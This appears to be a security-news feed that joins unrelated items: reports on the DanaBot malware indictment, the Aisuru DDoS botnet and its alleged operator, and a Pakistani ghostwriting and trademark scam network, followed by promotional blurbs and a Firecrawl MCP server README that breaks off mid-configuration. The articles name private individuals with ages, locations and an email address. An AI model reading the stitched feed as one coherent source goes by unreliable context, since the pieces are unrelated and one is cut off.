Initially spotted in May 2018 by researchers at the email security firm Proofpoint, DanaBot is a malware-as-a-service platform that specializes in credential theft and banking fraud.

Today, the U.S. Department of Justice unsealed a criminal complaint and indictment from 2022, which said the FBI identified at least 40 affiliates who were paying between $3,000 and $4,000 a month for access to the information stealer platform.

The government says the malware infected more than 300,000 systems globally, causing estimated losses of more than $50 million. The ringleaders of the DanaBot conspiracy are named as Aleksandr Stepanov, 39, a.k.a. “JimmBee,” and Artem Aleksandrovich Kalinkin, 34, a.k.a. “Onix”, both of Novosibirsk, Russia. Kalinkin is an IT engineer for the Russian state-owned energy giant Gazprom. His Facebook profile name is “Maffiozi.”

According to the FBI, there were at least two major versions of DanaBot; the first was sold between 2018 and June 2020, when the malware stopped being offered on Russian cybercrime forums. The government alleges that the second version of DanaBot — emerging in January 2021 — was provided to co-conspirators for use in targeting military, diplomatic and non-governmental organization computers in several countries, including the United States, Belarus, the United Kingdom, Germany, and Russia.

“Unindicted co-conspirators would use the Espionage Variant to compromise computers around the world and steal sensitive diplomatic communications, credentials, and other data from these targeted victims,” reads a grand jury indictment dated Sept. 20, 2022. “This stolen data included financial transactions by diplomatic staff, correspondence concerning day-to-day diplomatic activity, as well as summaries of a particular country’s interactions with the United States.”

The indictment says the FBI in 2022 seized servers used by the DanaBot authors to control their malware, as well as the servers that stored stolen victim data. The government said the server data also show numerous instances in which the DanaBot defendants infected their own PCs, resulting in their credential data being uploaded to stolen data repositories that were seized by the feds.

“In some cases, such self-infections appeared to be deliberately done in order to test, analyze, or improve the malware,” the criminal complaint reads. “In other cases, the infections seemed to be inadvertent – one of the hazards of committing cybercrime is that criminals will sometimes infect themselves with their own malware by mistake.”

Image: welivesecurity.com

A statement from the DOJ says that as part of today’s operation, agents with the Defense Criminal Investigative Service (DCIS) seized the DanaBot control servers, including dozens of virtual servers hosted in the United States. The government says it is now working with industry partners to notify DanaBot victims and help remediate infections. The statement credits a number of security firms with providing assistance to the government, including ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, Team CYMRU, and ZScaler.

It’s not unheard of for financially-oriented malicious software to be repurposed for espionage. A variant of the ZeuS Trojan, which was used in countless online banking attacks against companies in the United States and Europe between 2007 and at least 2015, was for a time diverted to espionage tasks by its author.

As detailed in this 2015 story, the author of the ZeuS trojan created a custom version of the malware to serve purely as a spying machine, which scoured infected systems in Ukraine for specific keywords in emails and documents that would likely only be found in classified documents.

The public charging of the 16 DanaBot defendants comes a day after Microsoft joined a slew of tech companies in disrupting the IT infrastructure for another malware-as-a-service offering — Lumma Stealer, which is likewise offered to affiliates under tiered subscription prices ranging from $250 to $1,000 per month. Separately, Microsoft filed a civil lawsuit to seize control over 2,300 domain names used by Lumma Stealer and its affiliates.

Further reading:

Danabot: Analyzing a Fallen Empire

ZScaler blog: DanaBot Launches DDoS Attack Against the Ukrainian Ministry of Defense

Flashpoint: Operation Endgame DanaBot Malware

Team CYMRU: Inside DanaBot’s Infrastructure: In Support of Operation Endgame II

March 2022 criminal complaint v. Artem Aleksandrovich Kalinkin

September 2022 grand jury indictment naming the 16 defendants

KrebsOnSecurity Hit With Near-Record 6.3 Tbps DDoS

KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test run for a massive new Internet of Things (IoT) botnet capable of launching crippling digital assaults that few web destinations can withstand. Read on for more about the botnet, the attack, and the apparent creator of this global menace.

For reference, the 6.3 Tbps attack last week was ten times the size of the assault launched against this site in 2016 by the Mirai IoT botnet, which held KrebsOnSecurity offline for nearly four days. The 2016 assault was so large that Akamai – which was providing pro-bono DDoS protection for KrebsOnSecurity at the time — asked me to leave their service because the attack was causing problems for their paying customers.

Since the Mirai attack, KrebsOnSecurity.com has been behind the protection of Project Shield, a free DDoS defense service that Google provides to websites offering news, human rights, and election-related content. Google Security Engineer Damian Menscher told KrebsOnSecurity the May 12 attack was the largest Google has ever handled. In terms of sheer size, it is second only to a very similar attack that Cloudflare mitigated and wrote about in April.

After comparing notes with Cloudflare, Menscher said the botnet that launched both attacks bears the fingerprints of Aisuru, a digital siege machine that first surfaced less than a year ago. Menscher said the attack on KrebsOnSecurity lasted less than a minute, hurling large UDP data packets at random ports at a rate of approximately 585 million data packets per second.

“It was the type of attack normally designed to overwhelm network links,” Menscher said, referring to the throughput connections between and among various Internet service providers (ISPs). “For most companies, this size of attack would kill them.”

A graph depicting the 6.5 Tbps attack mitigated by Cloudflare in April 2025. Image: Cloudflare.

The Aisuru botnet comprises a globally-dispersed collection of hacked IoT devices, including routers, digital video recorders and other systems that are commandeered via default passwords or software vulnerabilities. As documented by researchers at QiAnXin XLab, the botnet was first identified in an August 2024 attack on a large gaming platform.

Aisuru reportedly went quiet after that exposure, only to reappear in November with even more firepower and software exploits. In a January 2025 report, XLab found the new and improved Aisuru (a.k.a. “Airashi“) had incorporated a previously unknown zero-day vulnerability in Cambium Networks cnPilot routers.

NOT FORKING AROUND

The people behind the Aisuru botnet have been peddling access to their DDoS machine in public Telegram chat channels that are closely monitored by multiple security firms. In August 2024, the botnet was rented out in subscription tiers ranging from $150 per day to $600 per week, offering attacks of up to two terabits per second.

“You may not attack any measurement walls, healthcare facilities, schools or government sites,” read a notice posted on Telegram by the Aisuru botnet owners in August 2024.

Interested parties were told to contact the Telegram handle “@yfork” to purchase a subscription. The account @yfork previously used the nickname “Forky,” an identity that has been posting to public DDoS-focused Telegram channels since 2021.

According to the FBI, Forky’s DDoS-for-hire domains have been seized in multiple law enforcement operations over the years. Last year, Forky said on Telegram he was selling the domain stresser[.]best, which saw its servers seized by the FBI in 2022 as part of an ongoing international law enforcement effort aimed at diminishing the supply of and demand for DDoS-for-hire services.

“The operator of this service, who calls himself ‘Forky,’ operates a Telegram channel to advertise features and communicate with current and prospective DDoS customers,” reads an FBI seizure warrant (PDF) issued for stresser[.]best. The FBI warrant stated that on the same day the seizures were announced, Forky posted a link to a story on this blog that detailed the domain seizure operation, adding the comment, “We are buying our new domains right now.”

A screenshot from the FBI’s seizure warrant for Forky’s DDoS-for-hire domains shows Forky announcing the resurrection of their service at new domains.

Approximately ten hours later, Forky posted again, including a screenshot of the stresser[.]best user dashboard, instructing customers to use their saved passwords for the old website on the new one.

A review of Forky’s posts to public Telegram channels — as indexed by the cyber intelligence firms Unit 221B and Flashpoint — reveals a 21-year-old individual who claims to reside in Brazil [full disclosure: Flashpoint is currently an advertiser on this blog].

Since late 2022, Forky’s posts have frequently promoted a DDoS mitigation company and ISP that he operates called botshield[.]io. The Botshield website is connected to a business entity registered in the United Kingdom called Botshield LTD, which lists a 21-year-old woman from Sao Paulo, Brazil as the director. Internet routing records indicate Botshield (AS213613) currently controls several hundred Internet addresses that were allocated to the company earlier this year.

Domaintools.com reports that botshield[.]io was registered in July 2022 to a Kaike Southier Leite in Sao Paulo. A LinkedIn profile by the same name says this individual is a network specialist from Brazil who works in “the planning and implementation of robust network infrastructures, with a focus on security, DDoS mitigation, colocation and cloud server services.”

MEET FORKY

Image: Jaclyn Vernace / Shutterstock.com.

In his posts to public Telegram chat channels, Forky has hardly attempted to conceal his whereabouts or identity. In countless chat conversations indexed by Unit 221B, Forky could be seen talking about everyday life in Brazil, often remarking on the extremely low or high prices in Brazil for a range of goods, from computer and networking gear to narcotics and food.

Reached via Telegram, Forky claimed he was “not involved in this type of illegal actions for years now,” and that the project had been taken over by other unspecified developers. Forky initially told KrebsOnSecurity he had been out of the botnet scene for years, only to concede this wasn’t true when presented with public posts on Telegram from late last year that clearly showed otherwise.

Forky denied being involved in the attack on KrebsOnSecurity, but acknowledged that he helped to develop and market the Aisuru botnet. Forky claims he is now merely a staff member for the Aisuru botnet team, and that he stopped running the botnet roughly two months ago after starting a family. Forky also said the woman named as director of Botshield is related to him.

Forky offered equivocal, evasive responses to a number of questions about the Aisuru botnet and his business endeavors. But on one point he was crystal clear:

“I have zero fear about you, the FBI, or Interpol,” Forky said, asserting that he is now almost entirely focused on their hosting business — Botshield.

Forky declined to discuss the makeup of his ISP’s clientele, or to clarify whether Botshield was more of a hosting provider or a DDoS mitigation firm. However, Forky has posted on Telegram about Botshield successfully mitigating large DDoS attacks launched against other DDoS-for-hire services.

DomainTools finds the same Sao Paulo street address in the registration records for botshield[.]io was used to register several other domains, including cant-mitigate[.]us. The email address in the WHOIS records for that domain is forkcontato@gmail.com, which DomainTools says was used to register the domain for the now-defunct DDoS-for-hire service stresser[.]us, one of the domains seized in the FBI’s 2023 crackdown.

On May 8, 2023, the U.S. Department of Justice announced the seizure of stresser[.]us, along with a dozen other domains offering DDoS services. The DOJ said ten of the 13 domains were reincarnations of services that were seized during a prior sweep in December, which targeted 48 top stresser services (also known as “booters”).

Forky claimed he could find out who attacked my site with Aisuru. But when pressed a day later on the question, Forky said he’d come up empty-handed.

“I tried to ask around, all the big guys are not retarded enough to attack you,” Forky explained in an interview on Telegram. “I didn’t have anything to do with it. But you are welcome to write the story and try to put the blame on me.”

THE GHOST OF MIRAI

The 6.3 Tbps attack last week caused no visible disruption to this site, in part because it was so brief — lasting approximately 45 seconds. DDoS attacks of such magnitude and brevity typically are produced when botnet operators wish to test or demonstrate their firepower for the benefit of potential buyers. Indeed, Google’s Menscher said it is likely that both the May 12 attack and the slightly larger 6.5 Tbps attack against Cloudflare last month were simply tests of the same botnet’s capabilities.

In many ways, the threat posed by the Aisuru/Airashi botnet is reminiscent of Mirai, an innovative IoT malware strain that emerged in the summer of 2016 and successfully out-competed virtually all other IoT malware strains in existence at the time.

As first revealed by KrebsOnSecurity in January 2017, the Mirai authors were two U.S. men who co-ran a DDoS mitigation service — even as they were selling far more lucrative DDoS-for-hire services using the most powerful botnet on the planet.

Less than a week after the Mirai botnet was used in a days-long DDoS against KrebsOnSecurity, the Mirai authors published the source code to their botnet so that they would not be the only ones in possession of it in the event of their arrest by federal investigators.

Ironically, the leaking of the Mirai source is precisely what led to the eventual unmasking and arrest of the Mirai authors, who went on to serve probation sentences that required them to consult with FBI investigators on DDoS investigations. But that leak also rapidly led to the creation of dozens of Mirai botnet clones, many of which were harnessed to fuel their own powerful DDoS-for-hire services.

Menscher told KrebsOnSecurity that as counterintuitive as it may sound, the Internet as a whole would probably be better off if the source code for Aisuru became public knowledge. After all, he said, the people behind Aisuru are in constant competition with other IoT botnet operators who are all striving to commandeer a finite number of vulnerable IoT devices globally.

Such a development would almost certainly cause a proliferation of Aisuru botnet clones, he said, but at least then the overall firepower from each individual botnet would be greatly diminished — or at least within range of the mitigation capabilities of most DDoS protection providers.

Barring a source code leak, Menscher said, it would be nice if someone published the full list of software exploits being used by the Aisuru operators to grow their botnet so quickly.

“Part of the reason Mirai was so dangerous was that it effectively took out competing botnets,” he said. “This attack somehow managed to compromise all these boxes that nobody else knows about. Ideally, we’d want to see that fragmented out, so that no [individual botnet operator] controls too much.”

Simplifying Zero Trust: How Cisco Security Suites Drive Value

Discover how Cisco Security Suites are helping organizations achieve zero trust while realizing significant cost savings, improved productivity, and a 110% ROI.

What to Expect When You’re Convicted

When a formerly incarcerated “troubleshooter for the mafia” looked for a second career he chose the thing he knew best. He became a prison consultant for white-collar criminals.

Developing With Cisco XDR at Cisco Live San Diego ‘25

Join us at Cisco Live San Diego to explore Cisco XDR’s latest innovations, including custom integrations, AI automation, and community features. Don’t miss out!

US Customs and Border Protection Plans to Photograph Everyone Exiting the US by Car

A CBP spokesperson tells WIRED that the agency plans to expand its program for real-time face recognition at the border, potentially aiding Trump administration efforts to track people who self-deport.

Pakistani Firm Shipped Fentanyl Analogs, Scams to US

A Texas firm recently charged with conspiring to distribute synthetic opioids in the United States is at the center of a vast network of companies in the U.S. and Pakistan whose employees are accused of using online ads to scam westerners seeking help with trademarks, book writing, mobile app development and logo designs, a new investigation reveals.

In an indictment (PDF) unsealed last month, the U.S. Department of Justice said Dallas-based eWorldTrade “operated an online business-to-business marketplace that facilitated the distribution of synthetic opioids such as isotonitazene and carfentanyl, both significantly more potent than fentanyl.”

Launched in 2017, eWorldTrade[.]com now features a seizure notice from the DOJ. eWorldTrade operated as a wholesale seller of consumer goods, including clothes, machinery, chemicals, automobiles and appliances. The DOJ’s indictment includes no additional details about eWorldTrade’s business, origins or other activity, and at first glance the website might appear to be a legitimate e-commerce platform that also just happened to sell some restricted chemicals.

A screenshot of the eWorldTrade homepage on March 25, 2025. Image: archive.org.

However, an investigation into the company’s founders reveals they are connected to a sprawling network of websites that have a history of extortionate scams involving trademark registration, book publishing, exam preparation, and the design of logos, mobile applications and websites.

Records from the U.S. Patent and Trademark Office (USPTO) show the eWorldTrade mark is owned by an Azneem Bilwani in Karachi (this name also is in the registration records for the now-seized eWorldTrade domain). Mr. Bilwani is perhaps better known as the director of the Pakistan-based IT provider Abtach Ltd., which has been singled out by the USPTO and Google for operating trademark registration scams (the main offices for eWorldtrade and Abtach share the same address in Pakistan).

In November 2021, the USPTO accused Abtach of perpetrating “an egregious scheme to deceive and defraud applicants for federal trademark registrations by improperly altering official USPTO correspondence, overcharging application filing fees, misappropriating the USPTO’s trademarks, and impersonating the USPTO.”

Abtach offered trademark registration at suspiciously low prices compared to legitimate costs of over USD $1,500, and claimed they could register a trademark in 24 hours. Abtach reportedly rebranded to Intersys Limited after the USPTO banned Abtach from filing any more trademark applications.

In a note published to its LinkedIn profile, Intersys Ltd. asserted last year that certain scam firms in Karachi were impersonating the company.

FROM AXACT TO ABTACH

Many of Abtach’s employees are former associates of a similar company in Pakistan called Axact that was targeted by Pakistani authorities in a 2015 fraud investigation. Axact came under law enforcement scrutiny after The New York Times ran a front-page story about the company’s most lucrative scam business: Hundreds of sites peddling fake college degrees and diplomas.

People who purchased fake certifications were subsequently blackmailed by Axact employees posing as government officials, who would demand additional payments under threats of prosecution or imprisonment for having bought fraudulent “unauthorized” academic degrees. This practice created a continuous cycle of extortion, internally referred to as “upselling.”

“Axact took money from at least 215,000 people in 197 countries — one-third of them from the United States,” The Times reported. “Sales agents wielded threats and false promises and impersonated government officials, earning the company at least $89 million in its final year of operation.”

Dozens of top Axact employees were arrested, jailed, held for months, tried and sentenced to seven years for various fraud violations. But a 2019 research brief on Axact’s diploma mills found none of those convicted had started their prison sentence, and that several had fled Pakistan and never returned.

“In October 2016, a Pakistan district judge acquitted 24 Axact officials at trial due to ‘not enough evidence’ and then later admitted he had accepted a bribe (of $35,209) from Axact,” reads a history (PDF) published by the American Association of Collegiate Registrars and Admissions Officers.

In 2021, Pakistan’s Federal Investigation Agency (FIA) charged Bilwani and nearly four dozen others — many of them Abtach employees — with running an elaborate trademark scam. The authorities called it “the biggest money laundering case in the history of Pakistan,” and named a number of businesses based in Texas that allegedly helped move the proceeds of cybercrime.

A page from the March 2021 FIA report alleging that Digitonics Labs and Abtach employees conspired to extort and defraud consumers.

The FIA said the defendants operated a large number of websites offering low-cost trademark services to customers, before then “ignoring them after getting the funds and later demanding more funds from clients/victims in the name of up-sale (extortion).” The Pakistani law enforcement agency said that about 75 percent of customers received fake or fabricated trademarks as a result of the scams.

The FIA found Abtach operates in conjunction with a Karachi firm called Digitonics Labs, which earned a monthly revenue of around $2.5 million through the “extortion of international clients in the name of up-selling, the sale of fake/fabricated USPTO certificates, and the maintaining of phishing websites.”

According the Pakistani authorities, the accused also ran countless scams involving ebook publication and logo creation, wherein customers are subjected to advance-fee fraud and extortion — with the scammers demanding more money for supposed “copyright release” and threatening to release the trademark.

Also charged by the FIA was Junaid Mansoor, the owner of Digitonics Labs in Karachi. Mansoor’s U.K.-registered company Maple Solutions Direct Limited has run at least 700 ads for logo design websites since 2015, the Google Ads Transparency page reports. The company has approximately 88 ads running on Google as of today. 

Junaid Mansoor. Source: youtube/@Olevels․com School.

Mr. Mansoor is actively involved with and promoting a Quran study business called quranmasteronline[.]com, which was founded by Junaid’s brother Qasim Mansoor (Qasim is also named in the FIA criminal investigation). The Google ads promoting quranmasteronline[.]com were paid for by the same account advertising a number of scam websites selling logo and web design services. 

Junaid Mansoor did not respond to requests for comment. An address in Teaneck, New Jersey where Mr. Mansoor previously lived is listed as an official address of exporthub[.]com, a Pakistan-based e-commerce website that appears remarkably similar to eWorldTrade (Exporthub says its offices are in Texas). Interestingly, a search in Google for this domain shows ExportHub currently features multiple listings for fentanyl citrate from suppliers in China and elsewhere.

The CEO of Digitonics Labs is Muhammad Burhan Mirza, a former Axact official who was arrested by the FIA as part of its money laundering and trademark fraud investigation in 2021. In 2023, prosecutors in Pakistan charged Mirza, Mansoor and 14 other Digitonics employees with fraud, impersonating government officials, phishing, cheating and extortion. Mirza’s LinkedIn profile says he currently runs an educational technology/life coach enterprise called TheCoach360, which purports to help young kids “achieve financial independence.”

Reached via LinkedIn, Mr. Mirza denied having anything to do with eWorldTrade or any of its sister companies in Texas.

“Moreover, I have no knowledge as to the companies you have mentioned,” said Mr. Mirza, who did not respond to follow-up questions.

The current disposition of the FIA’s fraud case against the defendants is unclear. The investigation was marred early on by allegations of corruption and bribery. In 2021, Pakistani authorities alleged Bilwani paid a six-figure bribe to FIA investigators. Meanwhile, attorneys for Mr. Bilwani have argued that although their client did pay a bribe, the payment was solicited by government officials. Mr. Bilwani did not respond to requests for comment.

THE TEXAS NEXUS

KrebsOnSecurity has learned that the people and entities at the center of the FIA investigations have built a significant presence in the United States, with a strong concentration in Texas. The Texas businesses promote websites that sell logo and web design, ghostwriting, and academic cheating services. Many of these entities have recently been sued for fraud and breach of contract by angry former customers, who claimed the companies relentlessly upsold them while failing to produce the work as promised.

For example, the FIA complaints named Retrocube LLC and 360 Digital Marketing LLC, two entities that share a street address with eWorldTrade: 1910 Pacific Avenue, Suite 8025, Dallas, Texas. Also incorporated at that Pacific Avenue address is abtach[.]ae, a web design and marketing firm based in Dubai; and intersyslimited[.]com, the new name of Abtach after they were banned by the USPTO. Other businesses registered at this address market services for logo design, mobile app development, and ghostwriting.

A list published in 2021 by Pakistan’s FIA of different front companies allegedly involved in scamming people who are looking for help with trademarks, ghostwriting, logos and web design.

360 Digital Marketing’s website 360digimarketing[.]com is owned by an Abtach front company called Abtech LTD. Meanwhile, business records show 360 Digi Marketing LTD is a U.K. company whose officers include former Abtach director Bilwani; Muhammad Saad Iqbal, formerly Abtach, now CEO of Intersys Ltd; Niaz Ahmed, a former Abtach associate; and Muhammad Salman Yousuf, formerly a vice president at Axact, Abtach, and Digitonics Labs.

Google’s Ads Transparency Center finds 360 Digital Marketing LLC ran at least 500 ads promoting various websites selling ghostwriting services . Another entity tied to Junaid Mansoor — a company called Octa Group Technologies AU — has run approximately 300 Google ads for book publishing services, promoting confusingly named websites like amazonlistinghub[.]com and barnesnoblepublishing[.]co.

360 Digital Marketing LLC ran approximately 500 ads for scam ghostwriting sites.

Rameez Moiz is a Texas resident and former Abtach product manager who has represented 360 Digital Marketing LLC and RetroCube. Moiz told KrebsOnSecurity he stopped working for 360 Digital Marketing in the summer of 2023. Mr. Moiz did not respond to follow-up questions, but an Upwork profile for him states that as of April 2025 he is employed by Dallas-based Vertical Minds LLC.

In April 2025, California resident Melinda Will sued the Texas firm Majestic Ghostwriting — which is doing business as ghostwritingsquad[.]com —  alleging they scammed her out of $100,000 after she hired them to help write her book. Google’s ad transparency page shows Moiz’s employer Vertical Minds LLC paid to run approximately 55 ads for ghostwritingsquad[.]com and related sites.

Google’s ad transparency listing for ghostwriting ads paid for by Vertical Minds LLC.

VICTIMS SPEAK OUT

Ms. Will’s lawsuit is just one of more than two dozen complaints over the past four years wherein plaintiffs sued one of this group’s web design, wiki editing or ghostwriting services. In 2021, a New Jersey man sued Octagroup Technologies, alleging they ripped him off when he paid a total of more than $26,000 for the design and marketing of a web-based mapping service.

The plaintiff in that case did not respond to requests for comment, but his complaint alleges Octagroup and a myriad other companies it contracted with produced minimal work product despite subjecting him to relentless upselling. That case was decided in favor of the plaintiff because the defendants never contested the matter in court.

In 2023, 360 Digital Marketing LLC and Retrocube LLC were sued by a woman who said they scammed her out of $40,000 over a book she wanted help writing. That lawsuit helpfully showed an image of the office front door at 1910 Pacific Ave Suite 8025, which featured the logos of 360 Digital Marketing, Retrocube, and eWorldTrade.

The front door at 1910 Pacific Avenue, Suite 8025, Dallas, Texas.

The lawsuit was filed pro se by Leigh Riley, a 64-year-old career IT professional who paid 360 Digital Marketing to have a company called Talented Ghostwriter co-author and promote a series of books she’d outlined on spirituality and healing.

“The main reason I hired them was because I didn’t understand what I call the formula for writing a book, and I know there’s a lot of marketing that goes into publishing,” Riley explained in an interview. “I know nothing about that stuff, and these guys were convincing that they could handle all aspects of it. Until I discovered they couldn’t write a damn sentence in English properly.”

Riley’s well-documented lawsuit (not linked here because it features a great deal of personal information) includes screenshots of conversations with the ghostwriting team, which was constantly assigning her to new writers and editors, and ghosting her on scheduled conference calls about progress on the project. Riley said she ended up writing most of the book herself because the work they produced was unusable.

“Finally after months of promising the books were printed and on their way, they show up at my doorstep with the wrong title on the book,” Riley said. When she demanded her money back, she said the people helping her with the website to promote the book locked her out of the site.

A conversation snippet from Leigh Riley’s lawsuit against Talented Ghostwriter, aka 360 Digital Marketing LLC. “Other companies once they have you money they don’t even respond or do anything,” the ghostwriting team manager explained.

Riley decided to sue, naming 360 Digital Marketing LLC and Retrocube LLC, among others.  The companies offered to settle the matter for $20,000, which she accepted. “I didn’t have money to hire a lawyer, and I figured it was time to cut my losses,” she said.

Riley said she could have saved herself a great deal of headache by doing some basic research on Talented Ghostwriter, whose website claims the company is based in Los Angeles. According to the California Secretary of State, however, there is no registered entity by that name. Rather, the address claimed by talentedghostwriter[.]com is a vacant office building with a “space available” sign in the window.

California resident Walter Horsting discovered something similar when he sued 360 Digital Marketing in small claims court last year, after hiring a company called Vox Ghostwriting to help write, edit and promote a spy novel he’d been working on. Horsting said he paid Vox $3,300 to ghostwrite a 280-page book, and was upsold an Amazon marketing and publishing package for $7,500.

In an interview, Horsting said the prose that Vox Ghostwriting produced was “juvenile at best,” forcing him to rewrite and edit the work himself, and to partner with a graphical artist to produce illustrations. Horsting said that when it came time to begin marketing the novel, Vox Ghostwriting tried to further upsell him on marketing packages, while dodging scheduled meetings with no follow-up.

“They have a money back guarantee, and when they wouldn’t refund my money I said I’m taking you to court,” Horsting recounted. “I tried to serve them in Los Angeles but found no such office exists. I talked to a salon next door and they said someone else had recently shown up desperately looking for where the ghostwriting company went, and it appears there are a trail of corpses on this. I finally tracked down where they are in Texas.”

It was the same office that Ms. Riley served her lawsuit against. Horsting said he has a court hearing scheduled later this month, but he’s under no illusions that winning the case means he’ll be able to collect.

“At this point, I’m doing it out of pride more than actually expecting anything to come to good fortune for me,” he said.

The following mind map was helpful in piecing together key events, individuals and connections mentioned above. It’s important to note that this graphic only scratches the surface of the operations tied to this group. For example, in Case 2 we can see mention of academic cheating services, wherein people can be hired to take online proctored exams on one’s behalf. Those who hire these services soon find themselves subject to impersonation and blackmail attempts for larger and larger sums of money, with the threat of publicly exposing their unethical academic cheating activity.

A “mind map” illustrating the connections between and among entities referenced in this story. Click to enlarge.

GOOGLE RESPONDS

KrebsOnSecurity reviewed the Google Ad Transparency links for nearly 500 different websites tied to this network of ghostwriting, logo, app and web development businesses. Those website names were then fed into spyfu.com, a competitive intelligence company that tracks the reach and performance of advertising keywords. Spyfu estimates that between April 2023 and April 2025, those websites spent more than $10 million on Google ads.

Reached for comment, Google said in a written statement that it is constantly policing its ad network for bad actors, pointing to an ads safety report (PDF) showing Google blocked or removed 5.1 billion bad ads last year — including more than 500 million ads related to trademarks.

“Our policy against Enabling Dishonest Behavior prohibits products or services that help users mislead others, including ads for paper-writing or exam-taking services,” the statement reads. “When we identify ads or advertisers that violate our policies, we take action, including by suspending advertiser accounts, disapproving ads, and restricting ads to specific domains when appropriate.”

Google did not respond to specific questions about the advertising entities mentioned in this story, saying only that “we are actively investigating this matter and addressing any policy violations, including suspending advertiser accounts when appropriate.”

From reviewing the ad accounts that have been promoting these scam websites, it appears Google has very recently acted to remove a large number of the offending ads. Prior to my notifying Google about the extent of this ad network on April 28, the Google Ad Transparency network listed over 500 ads for 360 Digital Marketing; as of this publication, that number had dwindled to 10.

On April 30, Google announced that starting this month its ads transparency page will display the payment profile name as the payer name for verified advertisers, if that name differs from their verified advertiser name. Searchengineland.com writes the changes are aimed at increasing accountability in digital advertising.

This spreadsheet lists the domain names, advertiser names, and Google Ad Transparency links for more than 350 entities offering ghostwriting, publishing, web design and academic cheating services.

KrebsOnSecurity would like to thank the anonymous security researcher NatInfoSec for their assistance in this investigation.

For further reading on Abtach and its myriad companies in all of the above-mentioned verticals (ghostwriting, logo design, etc.), see this Wikiwand entry.

Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients

By: Unknown


A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

 

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor 🖥️ Note: Requires Cursor version 0.45.6+ For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
  5. Name: "firecrawl-mcp" (or your preferred name)
  6. Type: "command"
  7. Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code: json { "mcpServers": { "firecrawl-mcp": { "command": "npx", "args": ["-y", "firecrawl-mcp"], "env": { "FIRECRAWL_API_KEY": "YOUR-API-KEY" } } } }

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY"
}
}
}
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
  • Required when using cloud API (default)
  • Optional when using self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
  • Example: https://firecrawl.your-domain.com
  • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration
  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
Credit Usage Monitoring
  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
"mcpServers": {
"mcp-server-firecrawl": {
"command": "npx",
"args": ["-y", "firecrawl-mcp"],
"env": {
"FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

"FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
"FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
"FIRECRAWL_RETRY_MAX_DELAY": "30000",
"FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

"FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
